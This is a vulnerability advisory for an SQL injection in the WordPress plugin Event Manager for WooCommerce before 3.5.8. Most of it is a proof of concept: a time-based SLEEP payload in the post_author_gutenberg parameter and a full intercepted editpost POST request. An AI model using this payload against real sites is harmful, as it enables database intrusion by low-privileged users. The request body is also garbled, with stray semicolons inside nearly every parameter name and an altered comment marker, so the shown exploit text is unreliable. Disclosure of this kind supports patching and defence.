Event Manager for WooCommerce < 3.5.8 - Contributor+ SQL Injection

The plugin does not validate and escape the post_author_gutenberg parameter before using it in a SQL statement when creating/editing events, which could allow users with a role as low as contributor to perform SQL Injection attacks

PoC

Create or edit an event as a contributor, intercept the request and append the following payload to the post_author_gutenberg POST parameter: //WHERE//ID=VALID_POST_EVENT_ID//AND//SLEEP(10)//-- POST /wp-admin/post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1742 Connection: close Cookie: [contributor+] Upgrade-Insecure-Requests: 1 _wpnonce=89e8e9bf38&user;_ID=5&action;=editpost&originalaction;=editpost&post;_author=5&post;_type=mep_events&original;_post_status=pending&post;_ID=5724&meta-box-order-nonce;=b0848a8368&closedpostboxesnonce;=d77823a21d&original;_post_title=Contrib+SQLi&post;_title=Contrib+SQLi&samplepermalinknonce;=3929b239b6&content;=&wp-preview;=&original;_publish=Submit+for+Review&publish;=Submit+for+Review&tax;_input%5Bmep_cat%5D%5B%5D=0&tax;_input%5Bmep_org%5D%5B%5D=0&mep;_event_template=default-theme.php&mep;_fw_nonce=bd4f075693&mep;_list_thumbnail=&post;_author_gutenberg=5//WHERE//ID=5724//AND//SLEEP(10)//–&mep;_org_address=0&mep;_location_venue=&mep;_street=&mep;_city=&mep;_state=&mep;_postcode=&mep;_country=&mep;_event_ticket_type_nonce=3a65192659&option;_name_t%5B%5D=&option;_price_t%5B%5D=&option;_qty_t%5B%5D=&option;_default_qty_t%5B%5D=&option;_rsv_t%5B%5D=&option;_sale_end_date%5B%5D=&option;_sale_end_time%5B%5D=&option;_qty_t_type%5B%5D=&mep;_events_extra_price_nonce=14d31c6699&option;_name%5B%5D=&option;_price%5B%5D=&option;_qty%5B%5D=&option;_qty_type%5B%5D=&event;_start_date=&event;_start_time=&event;_end_date=&event;_end_time=00%3A00&event;_more_start_date%5B%5D=&event;_more_start_time%5B%5D=&event;_more_end_date%5B%5D=&event;_more_end_time%5B%5D=&mep;_event_ricn_text_nonce=8e31f2b499&mep;_rich_text_status=enable&mep;_rt_event_status=EventRescheduled&mep;_rt_event_attandence_mode=OfflineEventAttendanceMode&mep;_rt_event_prvdate=2022-02-02+13%3A25%3A04&mep;_event_reg_btn_nonce=c702a3ef44&mep;_event_sku=&mep;_reg_status=on&mep;_show_end_datetime=yes&mep;_event_reg_btn_nonce=c702a3ef44&mep;_available_seat=on&mep;_event_reset_btn_nonce=11ce7e0cfd&mp;_event_virtual_type_des=&mep;_member_only_user_role%5B%5D=all&mep;_fw_nonce=bd4f075693&mep;_event_cc_email_text=&excerpt;=